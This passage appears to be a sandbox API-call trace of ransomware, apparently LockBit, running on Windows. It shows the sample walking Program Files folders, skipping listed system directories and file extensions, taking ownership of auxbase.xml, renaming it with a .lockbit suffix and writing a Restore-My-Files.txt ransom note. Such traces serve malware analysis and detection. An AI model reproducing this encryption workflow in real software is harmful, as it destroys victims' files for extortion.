0x3b8 [0080.165] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.165] malloc (_Size=0x40068) returned 0x20abae0 [0080.165] WriteFile (in: hFile=0x3b8, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0080.167] GetLastError () returned 0x3e5 [0080.167] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0080.167] GetLastError () returned 0x12 [0080.167] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0080.167] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0080.167] lstrcmpiW (lpString1=".", lpString2="fsdefinitions") returned -1 [0080.167] lstrcmpiW (lpString1="..", lpString2="fsdefinitions") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="$windows.~bt") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="intel") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="msocache") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="$recycle.bin") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="$windows.~ws") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="tor browser") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="boot") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="system volume information") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="perflogs") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="google") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="application data") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="windows") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="windows.old") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="appdata") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="Windows nt") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="Msbuild") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="Microsoft") returned -1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="All users") returned 1 [0080.168] lstrcmpiW (lpString1="fsdefinitions", lpString2="mozilla") returned -1 [0080.168] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 65 [0080.168] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*") returned 67 [0080.168] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0080.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.177] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0080.177] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.177] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.177] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="auxpad", cAlternateFileName="")) returned 1 [0080.177] lstrcmpiW (lpString1=".", lpString2="auxpad") returned -1 [0080.177] lstrcmpiW (lpString1="..", lpString2="auxpad") returned -1 [0080.177] lstrcmpiW (lpString1="auxpad", lpString2="$windows.~bt") returned 1 [0080.177] lstrcmpiW (lpString1="auxpad", lpString2="intel") returned -1 [0080.177] lstrcmpiW (lpString1="auxpad", lpString2="msocache") returned -1 [0080.177] lstrcmpiW (lpString1="auxpad", lpString2="$recycle.bin") returned 1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="$windows.~ws") returned 1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="tor browser") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="boot") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="system volume information") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="perflogs") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="google") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="application data") returned 1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="windows") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="windows.old") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="appdata") returned 1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="Windows nt") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="Msbuild") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="Microsoft") returned -1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="All users") returned 1 [0080.178] lstrcmpiW (lpString1="auxpad", lpString2="mozilla") returned -1 [0080.178] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 72 [0080.178] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*") returned 74 [0080.178] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0080.179] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.179] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0080.179] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.179] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.179] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0080.179] lstrcmpiW (lpString1=".", lpString2="auxbase.xml") returned -1 [0080.179] lstrcmpiW (lpString1="..", lpString2="auxbase.xml") returned -1 [0080.179] PathFindExtensionW (pszPath="auxbase.xml") returned=".xml" [0080.179] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.179] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.179] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.179] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.179] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.179] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.180] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.181] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.181] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.181] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="auxbase.xml") returned 1 [0080.181] lstrcmpiW (lpString1="ntldr", lpString2="auxbase.xml") returned 1 [0080.181] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="auxbase.xml") returned 1 [0080.181] lstrcmpiW (lpString1="bootsect.bak", lpString2="auxbase.xml") returned 1 [0080.181] lstrcmpiW (lpString1="autorun.inf", lpString2="auxbase.xml") returned -1 [0080.182] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\") returned="" [0080.182] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned=".xml" [0080.182] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.182] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.182] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.183] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.183] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit") returned 92 [0080.183] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.183] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit")) returned 0 [0080.184] GetLastError () returned 0x5 [0080.185] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.185] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.185] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.185] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.185] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.186] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b4, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.186] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.186] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0080.194] NtClose (Handle=0x3b4) returned 0x0 [0080.195] RtlFreeAnsiString (AnsiString="\\") [0080.195] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b4) returned 1 [0080.195] malloc (_Size=0x200) returned 0x53fcc0 [0080.195] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0080.195] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.195] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.195] CloseHandle (hObject=0x3b4) returned 1 [0080.195] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0080.196] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0080.196] free (_Block=0x53fcc0) [0080.196] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.196] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit")) returned 1 [0080.198] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0080.198] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.198] malloc (_Size=0x40068) returned 0x20abae0 [0080.198] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=1434) returned 1 [0080.198] ReadFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 0x0 [0080.205] GetLastError () returned 0x3e5 [0080.205] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 1 [0080.205] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\Restore-My-Files.txt") returned 93 [0080.205] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0080.205] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.206] malloc (_Size=0x40068) returned 0x206b860 [0080.206] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.207] GetLastError () returned 0x3e5 [0080.207] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="auxbase.xml", cAlternateFileName="")) returned 0 [0080.208] GetLastError () returned 0x12 [0080.208] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0080.208] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0080.208] lstrcmpiW (lpString1=".", lpString2="auxpad.xml") returned -1 [0080.208] lstrcmpiW (lpString1="..", lpString2="auxpad.xml") returned -1 [0080.208] PathFindExtensionW (pszPath="auxpad.xml") returned=".xml" [0080.208] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.208] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.209] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.210] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.210] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="auxpad.xml") returned 1 [0080.210] lstrcmpiW (lpString1="ntldr", lpString2="auxpad.xml") returned 1 [0080.210] 